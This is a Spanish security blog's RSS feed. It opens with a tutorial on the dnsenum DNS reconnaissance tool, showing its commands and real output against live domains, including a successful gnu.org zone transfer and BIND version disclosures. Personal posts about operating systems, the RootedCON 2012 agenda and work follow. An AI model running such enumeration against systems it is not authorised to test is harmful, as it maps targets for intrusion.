<p>&#8220;La información es poder&#8221;, y que razón tenía <a href="http://es.wikipedia.org/wiki/Francis_Bacon">Francis BACON</a> al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo.</p>
<p>Una de las cosas que se pueden mirar es la versión del DNS, y es por eso que existen herramientas como dnsenum que te facilitan esta tarea.</p>
<p>dnsenum evalúa:</p>
<p>1) Get the host&#8217;s addresse (A record).</p>
<p>2) Get the namservers (threaded).</p>
<p>3) Get the MX record (threaded).</p>
<p>4) Perform axfr queries on nameservers and get BIND versions(threaded).</p>
<p>5) Get extra names and subdomains via google scraping (google query = &#8220;allinurl: -www site:domain&#8221;).</p>
<p>6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).</p>
<p>7) Calculate C class domain network ranges and perform whois queries on them (threaded).</p>
<p>8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).</p>
<p>9) Write to domain_ips.txt file ip-blocks.</p>
<p>Nos sirve perfectamente para hacer las pruebas que necesitamos.</p>
<p>La herramienta la podemos descargar por SVN de aquí: <a href="http://code.google.com/p/dnsenum/source/checkout">dnsenum</a></p>
<p>Para hacerla funcionar hará falta que se instalen los siguiente módulos cpan:</p>
<p>Necesarios:<br />
Net::IP<br />
Net::DNS<br />
Net::Netmask<br />
Opcionales:<br />
Net::Whois::IP<br />
HTML::Parser<br />
WWW::Mechanize<br />
XML::Writer</p>
<p>Una vez tengamos los requisitos necesarios podemos empezar a usar la aplicación, pondré tres ejemplos.</p>
<p>Host que NO permite trasferencia de zona:</p>
<p>Para lanzar dnsenum</p>
<p>perl dnsenum.pl xubuntu.com</p>
<p>dnsenum.pl VERSION:1.2.2</p>
<blockquote><p>&#8212;&#8211; xubuntu.com &#8212;&#8211;<br />
Host&#8217;s addresses:<br />
__________________</p>
<p>xubuntu.com 600 IN A 91.189.90.40<br />
xubuntu.com 600 IN A 91.189.90.41<br />
xubuntu.com 600 IN A 91.189.89.88<br />
Name Servers:<br />
______________</p>
<p>ns1.canonical.com 147710 IN A 91.189.94.173<br />
ns2.canonical.com 147528 IN A 91.189.94.219<br />
ns3.canonical.com 126351 IN A 209.6.3.210<br />
Mail (MX) Servers:<br />
___________________</p>
<p>&nbsp;</p>
<p>Trying Zone Transfers and getting Bind Versions:<br />
_________________________________________________<br />
Trying Zone Transfer for xubuntu.com on ns1.canonical.com &#8230;<br />
AXFR record query failed: NOERROR</p>
<p>ns1.canonical.com Bind Version: 9.7.3</p>
<p>Trying Zone Transfer for xubuntu.com on ns3.canonical.com &#8230;<br />
AXFR record query failed: NOERROR</p>
<p>ns3.canonical.com Bind Version: 9.7.3</p>
<p>Trying Zone Transfer for xubuntu.com on ns2.canonical.com &#8230;<br />
AXFR record query failed: NOERROR</p>
<p>ns2.canonical.com Bind Version: 9.7.3<br />
Wildcards detected, all subdomains will point to the same IP address, bye.</p></blockquote>
<p>Podemos ver que ha conseguido extraer la información del BIND pero no permite trasferencia de Zona.</p>
<p>Hagamos otra comprobación:</p>
<p>perl dnsenum.pl gnu.org</p>
<p>dnsenum.pl VERSION:1.2.2</p>
<blockquote><p>&#8212;&#8211; gnu.org &#8212;&#8211;<br />
Host&#8217;s addresses:<br />
__________________</p>
<p>gnu.org 300 IN A 140.186.70.148<br />
Name Servers:<br />
______________</p>
<p>ns2.gnu.org 300 IN A 87.98.253.102<br />
ns1.gnu.org 300 IN A 140.186.70.164<br />
ns3.gnu.org 300 IN A 46.43.37.70<br />
Mail (MX) Servers:<br />
___________________</p>
<p>eggs.gnu.org 300 IN A 140.186.70.92<br />
Trying Zone Transfers and getting Bind Versions:<br />
_________________________________________________<br />
Trying Zone Transfer for gnu.org on ns2.gnu.org &#8230;<br />
gnu.org 300 IN SOA<br />
gnu.org 300 IN A 140.186.70.148<br />
gnu.org 300 IN TXT<br />
gnu.org 300 IN MX<br />
gnu.org 300 IN NS<br />
gnu.org 300 IN NS<br />
gnu.org 300 IN NS<br />
gnu.org 300 IN SSHFP<br />
alpha.gnu.org 300 IN A 140.186.70.21<br />
anoncvs.gnu.org 300 IN CNAME<br />
arch.gnu.org 300 IN CNAME<br />
audio-video.gnu.org 300 IN CNAME<br />
audio-video-dev.gnu.org 300 IN A 140.186.70.157<br />
audio-video-dev.gnu.org 300 IN SSHFP<br />
autoconfig.gnu.org 300 IN A 140.186.70.30<br />
be.gnu.org 300 IN NS<br />
be.gnu.org 300 IN NS<br />
ftp.be.gnu.org 300 IN CNAME<br />
www.be.gnu.org 300 IN CNAME<br />
beeblebrox.gnu.org 300 IN SSHFP<br />
bugs.gnu.org 300 IN A 140.186.70.43<br />
bzr.gnu.org 300 IN CNAME<br />
catalyst.gnu.org 300 IN SSHFP<br />
chapters.gnu.org 300 IN A 91.121.254.230<br />
front.chapters.gnu.org 300 IN A 91.121.254.230<br />
clock.gnu.org 300 IN CNAME<br />
www.cn.gnu.org 300 IN A 61.152.210.194<br />
cvs.gnu.org 300 IN CNAME<br />
dbd.gnu.org 300 IN A 140.186.70.32<br />
dbd.gnu.org 300 IN SSHFP<br />
debbugs.gnu.org 300 IN A 140.186.70.43<br />
debbugs.gnu.org 300 IN SSHFP<br />
eggs.gnu.org 300 IN A 140.186.70.92<br />
eggs.gnu.org 300 IN SSHFP<br />
elpa.gnu.org 300 IN A 140.186.70.89<br />
elpa.gnu.org 300 IN SSHFP<br />
es.gnu.org 300 IN MX<br />
es.gnu.org 300 IN A 91.121.254.230<br />
bee.es.gnu.org 300 IN CNAME<br />
www.bee.es.gnu.org 300 IN CNAME<br />
bluewall.es.gnu.org 300 IN CNAME<br />
bussiness.es.gnu.org 300 IN CNAME<br />
bw.es.gnu.org 300 IN CNAME<br />
conferencias.es.gnu.org 300 IN CNAME<br />
emacs.es.gnu.org 300 IN CNAME<br />
www.emacs.es.gnu.org 300 IN CNAME<br />
empresas.es.gnu.org 300 IN CNAME<br />
evalhackers.es.gnu.org 300 IN CNAME<br />
ftp.es.gnu.org 300 IN CNAME<br />
ghm.es.gnu.org 300 IN CNAME</p>
<p>[...]</p></blockquote>
<p>Podemos ver que el dominio de GNU.org permite trasferencia de zona en el DNS.</p>
<p>En algún DNS también nos dejan mensajes de los mas curiosos:</p>
<p>perl dnsenum aeat.es</p>
<blockquote><p>&#8212;&#8211; aeat.es &#8212;&#8211;<br />
Host&#8217;s addresses:<br />
__________________</p>
<p>aeat.es 3176 IN A 195.235.106.193<br />
Name Servers:<br />
______________</p>
<p>esifw2.tsai.es 106 IN A 213.4.194.5<br />
esifw1.tsai.es 256 IN A 213.0.43.37<br />
Mail (MX) Servers:<br />
___________________</p>
<p>correodeempresas.telefonica.es 300 IN A 212.170.236.87<br />
Trying Zone Transfers and getting Bind Versions:<br />
_________________________________________________<br />
Trying Zone Transfer for aeat.es on esifw1.tsai.es &#8230;<br />
AXFR record query failed: NOERROR</p>
<p><strong>esifw1.tsai.es Bind Version: :-b</strong></p></blockquote>
<p>Parece ser que no quieren que miremos la versión <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>Si queréis analizar un DNS de manera automática esta herramienta os puede ayudar.</p>
<p>&nbsp;</p>
<p>Saludos!</p>
<br />Filed under: <a href='http://seifreed.com/category/networking/dns/'>DNS</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/dns/'>DNS</a>, <a href='http://seifreed.com/tag/enumeracion/'>enumeración</a>, <a href='http://seifreed.com/tag/pentesting/'>pentesting</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4061/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4061/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4061/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4061&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/10/pentesting-al-dns-dnsenum/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>Mi sistema operativo de trabajo y.. algunos tips&#8230;</title>
		<link>http://seifreed.com/2012/02/09/mi-sistema-operativo-de-trabajo-y-algunos-tips/</link>
		<comments>http://seifreed.com/2012/02/09/mi-sistema-operativo-de-trabajo-y-algunos-tips/#comments</comments>
		<pubDate>Thu, 09 Feb 2012 18:50:45 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Personal]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4057</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! A gustos colores, y esto, ¿porque lo digo? Porque cada uno se encuentra cómodo con su sistema operativo. Hay una frase que siempre comenta en los podcast el crack de Dabo (desde aquí te mando un saludo) que dice que hace tiempo que dejó la guerra de sistemas. La verdad [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4057&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>A gustos colores, y esto, ¿porque lo digo? Porque cada uno se encuentra cómodo con su sistema operativo. Hay una frase que siempre comenta en los podcast el crack de <a href="http://twitter.com/daboblog">Dabo</a> (desde aquí te mando un saludo) que dice que hace tiempo que dejó la guerra de sistemas.</p>
<p>La verdad es que es imposible afirmar &#8220;este es el sistema operativo de trabajo perfecto&#8221; y por mi parte me siento muy cómodo trabajando con MAC, con Windows o con Linux. De hecho mientras me leía el libro de<a href="http://twitter.com/ssantosv"> Sergio de los Santos</a> sobre <a href="http://www.informatica64.com/libros.aspx">Máxima Seguridad en Windows</a>, decidí formatear mi máquina y configurarla haciendo uso de las buenas prácticas que comenta Sergio en su libro.</p>
<p>También hubo una temporada que tenía los <a href="http://seifreed.com/2008/11/09/triple-boot-ubuntu-mac-y-vista/">3 sistemas operativos instalados</a> para trabajar todo gestionado con grub haciendo uso de un triple boot. Estaba muy bien pero era muy incómodo para trabajar.</p>
<p>Finalmente y haciendo caso de <a href="http://twitter.com/nodondevivo">un colega</a> me he instalado <a href="http://xubuntu.org/">Xubuntu</a>, es decir Ubuntu con el entorno de escritorio de XFCE, y la verdad es que estoy muy, pero que muy contento con el resultado siempre había sido fiel a Ubuntu, la distribución que ahora viene con el <del>puto</del> Unity. Pero al probar esta versión de Ubuntu el resultado, me ha gustado mucho. Lo malo de trabajar en empresa con un sistema GNU/LINUX son varios el mas importante son la entrega de informes que al estar hechos con Microsoft Word cuando los abres con Libre Office el resultado  en fin&#8230; Y el hecho de migrarlas todavía no me lo he planteado así que al final has de acabar tirando de máquina virtual para poder hacer algunas cosas. En mi caso y eso que soy vmware-adicto he optado por Virtualbox. Es bastante ligero y de momento me está aportando los resultados que deseo.</p>
<p>En cuanto a Xubuntu aún no he personalizado el sistema tan solo me he instalado algunos módulos de perl que necesito y algunas herramientas para mi trabajo diario. Eso si, no puedo dejar de recomendar para trabajar <a href="https://launchpad.net/synapse-project">Synapse</a>. Es una herramienta que mediante control + espacio te permite poder lanzar aplicaciones además de hacer búsquedas muy rápidas en tu sistema. Aprende de las aplicaciones que mas usas además de poder discernir que quieres buscar y que no, es decir, puedes quitar cosas del índice de búsqueda.</p>
<p>Con la terminal + VIM ya puedo hacer muchas cosas, y si tengo alguna cosas que he echo ha faltar del Sistema Windows sobretodo en temas de herramientas siempre puedo tirar de máquina virtual.</p>
<p>En mi casa uso MAC con <a href="http://seifreed.com/2011/03/11/dos-nuevos-equipos-en-mi-poder-mac-book-y-nexus-one/">el Macbook que me reagalaron</a> la verdad es que estoy enamorado del sistema operativo y de la funcionalidad, <a href="http://www.elladodelmal.com/2011/08/los-anti-switching-en-mac-os-x-lion-1.html">aunque algunos la critiquen</a> y otros digan que <a href="http://www.seguridadapple.com/2012/01/mac-os-x-tuvo-58-variantes-de-malware.html">es muy inseguro</a> (que raźon no les falta)</p>
<p>En fin, la conclusión al final, es que no hay un sistema operativo mejor que otro y que uses el que más cómodo te sientas.</p>
<p>Saludos!</p>
<br />Filed under: <a href='http://seifreed.com/category/personal/'>Personal</a> Tagged: <a href='http://seifreed.com/tag/personal/'>Personal</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4057/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4057/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4057/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4057/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4057/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4057/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4057/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4057/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4057/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4057/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4057/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4057/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4057/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4057/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4057&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/09/mi-sistema-operativo-de-trabajo-y-algunos-tips/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>Mi asistencia a la RootedCON 2012</title>
		<link>http://seifreed.com/2012/02/08/mi-asistencia-a-la-rootedcon-2012/</link>
		<comments>http://seifreed.com/2012/02/08/mi-asistencia-a-la-rootedcon-2012/#comments</comments>
		<pubDate>Wed, 08 Feb 2012 07:00:32 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Conferencia]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[madrid]]></category>
		<category><![CDATA[rootedcon]]></category>
		<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4053</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Si! Por fin este año podré acceder a las conferencias RootedCON que se celebran en Madrid en 2012. El primer año, me fue imposible venir, en el segundo compré la entrada pero por temas de trabajo me fue del todo imposible el poder asistir.. la verdad es que me quedé [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4053&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Si! Por fin este año podré acceder a las conferencias RootedCON que se celebran en Madrid en 2012.</p>
<p>El primer año, me fue imposible venir, en el segundo compré la entrada pero por temas de trabajo me fue del todo imposible el poder asistir.. la verdad es que me quedé a las puertas además de sin el dinero X).</p>
<p>Pero este año junto con compañeros de la empresa estaremos disfrutando de las jornadas de de la RootedCON que además como cada año las ponencias y ponentes destacan por su calidad.</p>
<p>Las ponencias están confirmadas y la agenda ya está expuesta en la web de la RootedCON</p>
<p><a href="http://www.rootedcon.es/index.php/agenda/" target="_blank">Agenda de la RootedCON</a></p>
<p>Además estas conferencias sirven para reencontrarse con viejos amigos, como por ejemplo el caso de <a href="http://twitter.com/lawwait" target="_blank">Lorenzo Martinez</a> este crack editor del blog de Security by Default y que además hace poco estuvo en Mundo Hacker os recomiendo ver el video</p>
<p><a href="http://www.globbtv.com/mundohackertv/108/programa/2023/mundo-hacker-temporada-2---pg-01/0" target="_blank">Análisis forense informático</a></p>
<p>Tampoco me olvido de <a href="http://twitter.com/chemaalonso" target="_blank">Chemita Alonso, el Maligno</a> que junto Manu, The Sur! Es una de las charlas que MAS me interesa. También contarán con <a href="http://twitter.com/yjesus" target="_blank">Yago Jesús</a> otro de los editores del blog de Security by Default</p>
<p>Tampoco me olvido de Pedro Sánchez que no pudo dar su charla en la edición pasada, por problemas y como no, mi compañeros <a href="http://twitter.com/eternaltodo" target="_blank">Jose Miguel Esparza</a> y <a href="http://twitter.com/mgastesi" target="_blank">Mikel Gastesi</a> que darán una charla de lo que mas saben!</p>
<p>Os copio y pego la agena de la RootedCON:</p>
<table id="wp-table-reloaded-id-10-no-1">
<tbody>
<tr>
<td colspan="2">Jueves, 1 de Marzo de 2012</td>
</tr>
<tr>
<td>09:00 &#8211; 10:00</td>
<td><strong>RECEPCIÓN Día 1</strong></td>
</tr>
<tr>
<td>10:00 &#8211; 10:20</td>
<td>Organización RootedCON<br />
<em>Keynote Rooted CON 2012</em></td>
</tr>
<tr>
<td>10:20 &#8211; 11:10</td>
<td>Guillermo Grande y Alberto Ortega<br />
<em>Building an IP reputation engine, tracking the miscreants</em></td>
</tr>
<tr>
<td>11:10 &#8211; 11:40</td>
<td>Luis Delgado<br />
<em>XMPP, algo más que chat</em></td>
</tr>
<tr>
<td>11:40 &#8211; 12:00</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>12:00 &#8211; 13:00</td>
<td>José Miguel Esparza y Mikel Gastesi<br />
<em>Social Engineering in Banking Trojans: Attacking the weakest link</em></td>
</tr>
<tr>
<td>13:00 &#8211; 14:00</td>
<td>Juan Garrido<br />
<em>Corporate Forensics. Saca partido a tu arquitectura</em></td>
</tr>
<tr>
<td>14:00 &#8211; 15:30</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>15:30 &#8211; 16:00</td>
<td>Epsylon<br />
<em>XSSer &#8211; the cross site scripting framework</em></td>
</tr>
<tr>
<td>16:00 &#8211; 17:00</td>
<td>Yago Jesús<br />
<em>Applied Cryptography FAILs</em></td>
</tr>
<tr>
<td>17:00 &#8211; 17:20</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>17:20 &#8211; 18:20</td>
<td>Pedro Sánchez<br />
<em>Hospital Central. Historia de una extorsión</em></td>
</tr>
<tr>
<td>18:20 &#8211; 19:20</td>
<td><strong>RootedPanel I</strong><br />
<em>Fuerzas y Cuerpos de Seguridad del Estado</em></td>
</tr>
<tr>
<td>19:20 &#8211; 19:30</td>
<td><strong>CLAUSURA Día 1</strong></td>
</tr>
</tbody>
</table>
<table id="wp-table-reloaded-id-11-no-1">
<tbody>
<tr>
<td colspan="2">Viernes, 2 de Marzo de 2012</td>
</tr>
<tr>
<td>09:00 &#8211; 10:00</td>
<td><strong>RECEPCIÓN MAÑANA Día 2</strong></td>
</tr>
<tr>
<td>10:00 &#8211; 10:50</td>
<td>Gerardo García Peña<br />
<em>Enfoque práctico a la denegación de servicio</em></td>
</tr>
<tr>
<td>10:50 &#8211; 11:40</td>
<td>Lorenzo Martínez<br />
<em>Welcome to your secure /home, $user</em></td>
</tr>
<tr>
<td>11:40 &#8211; 12:00</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>12:00 &#8211; 13:00</td>
<td>Carlos Díaz y Fco. Jesús Gómez<br />
<em>CMD: Look who&#8217;s talking too</em></td>
</tr>
<tr>
<td>13:00 &#8211; 14:00</td>
<td>Jaime Peñalba<br />
<em>La curiosidad enjauló al gato</em></td>
</tr>
<tr>
<td>14:00 &#8211; 15:30</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>15:30 &#8211; 16:30</td>
<td>Eloi Sanfélix y Javier Moreno<br />
<em>Hardware hacking on your couch</em></td>
</tr>
<tr>
<td>16:30 &#8211; 17:00</td>
<td>Pablo San Emeterio<br />
<em>WHF &#8211; Windows Hooking Framework</em></td>
</tr>
<tr>
<td>17:00 &#8211; 17:20</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>17:20 &#8211; 18:20</td>
<td>Chema Alonso y Manu &#8220;The Sur&#8221;<br />
<em>Owning &#8220;bad&#8221; guys {and mafia} with Javascript botnets</em></td>
</tr>
<tr>
<td>18:20 &#8211; 19:20</td>
<td><strong>RootedPanel II</strong><br />
<em>Comunidad de seguridad</em></td>
</tr>
<tr>
<td>19:20 &#8211; 19:30</td>
<td><strong>CLAUSURA Día 2</strong></td>
</tr>
</tbody>
</table>
<table id="wp-table-reloaded-id-12-no-1">
<tbody>
<tr>
<td colspan="2">Sábado, 3 de Marzo de 2012</td>
</tr>
<tr>
<td>09:00 &#8211; 10:00</td>
<td><strong>RECEPCIÓN Día 3</strong></td>
</tr>
<tr>
<td>10:00 &#8211; 10:50</td>
<td>José Picó y David Pérez<br />
<em>Nuevos escenarios de ataque con estación base falsa</em></td>
</tr>
<tr>
<td>10:50 &#8211; 11:40</td>
<td>Sebastián Guerrero<br />
<em>Show me your kung-fu!</em></td>
</tr>
<tr>
<td>11:40 &#8211; 12:00</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>12:00 &#8211; 13:00</td>
<td>Ricardo J. Rodríguez<br />
<em>Mejora en el Proceso de Desempacado usando Técnicas DBI</em></td>
</tr>
<tr>
<td>13:00 &#8211; 14:00</td>
<td>Hugo Teso<br />
<em>Inguma 0.5 &#8211; Red Wagon</em></td>
</tr>
<tr>
<td>14:00 &#8211; 15:30</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>15:30 &#8211; 16:00</td>
<td><strong>RootedForge 2012</strong></td>
</tr>
<tr>
<td>16:00 &#8211; 16:50</td>
<td>Manu Quintans y Frank Ruiz<br />
<em>All Your Crimeware Are Belong To Us!</em></td>
</tr>
<tr>
<td>16:50 &#8211; 17:10</td>
<td><strong>DESCANSO</strong></td>
</tr>
<tr>
<td>17:10 &#8211; 18:30</td>
<td>Raúl Siles y José A. Guasch<br />
<em>Seguridad de aplicaciones web basadas en el DNIe</em></td>
</tr>
<tr>
<td>18:30 &#8211; 19:00</td>
<td>Organización RootedCON<br />
<em>Premios CTF</em></td>
</tr>
<tr>
<td>19:00 &#8211; 19:10</td>
<td><strong>CLAUSURA Rooted CON 2012</strong></td>
</tr>
</tbody>
</table>
<p>Y hasta aquí el tema de las conferencias, espero veros por la RootedCON <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<br />Filed under: <a href='http://seifreed.com/category/personal/conferencia/'>Conferencia</a>, <a href='http://seifreed.com/category/personal/'>Personal</a> Tagged: <a href='http://seifreed.com/tag/madrid/'>madrid</a>, <a href='http://seifreed.com/tag/personal/'>Personal</a>, <a href='http://seifreed.com/tag/rootedcon/'>rootedcon</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4053/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4053/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4053/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4053/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4053/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4053/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4053/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4053/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4053/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4053/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4053/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4053/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4053/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4053/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4053&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/08/mi-asistencia-a-la-rootedcon-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>Érase un hombre a un trabajo pegado&#8230;</title>
		<link>http://seifreed.com/2012/02/07/erase-un-hombre-a-un-trabajo-pegado/</link>
		<comments>http://seifreed.com/2012/02/07/erase-un-hombre-a-un-trabajo-pegado/#comments</comments>
		<pubDate>Tue, 07 Feb 2012 21:57:19 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[trabajo]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4051</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Pues como bien dice el título de este artículo no encuentro tiempo para hacer nada, en realidad es bueno ya que la curva de aprendizaje adquirida con el trabajo esta siendo elevada, pero la verdad a veces desearía tener tiempo para mas cosas. Tengo varios artículos en borrador alguna entrevista, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4051&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Pues como bien dice el título de este artículo no encuentro tiempo para hacer nada, en realidad es bueno ya que la curva de aprendizaje adquirida con el trabajo esta siendo elevada, pero la verdad a veces desearía tener tiempo para mas cosas.</p>
<p>Tengo varios artículos en borrador alguna entrevista, algún sorteo etc.. Espero poder sacar hacia adelante esto y no dejarlo muerto, que ya me están mandando correos de que esto no lo deje así que ya están esperando actualizaciones. Así que como al final me debo a mis lectores :p.</p>
<p>He vuelto a cambiar el diseño del blog, he añadido un buscador a la derecha arriba, que se e habían quejado de que no había puesto buscador.</p>
<p>Abajo he añadido un calendario, las estadísticas de Askimet, los artículos que mas se han visitado, creo que al final ha quedado bastante bonito <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>&nbsp;</p>
<p>Iréis teniendo mas noticias mías <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
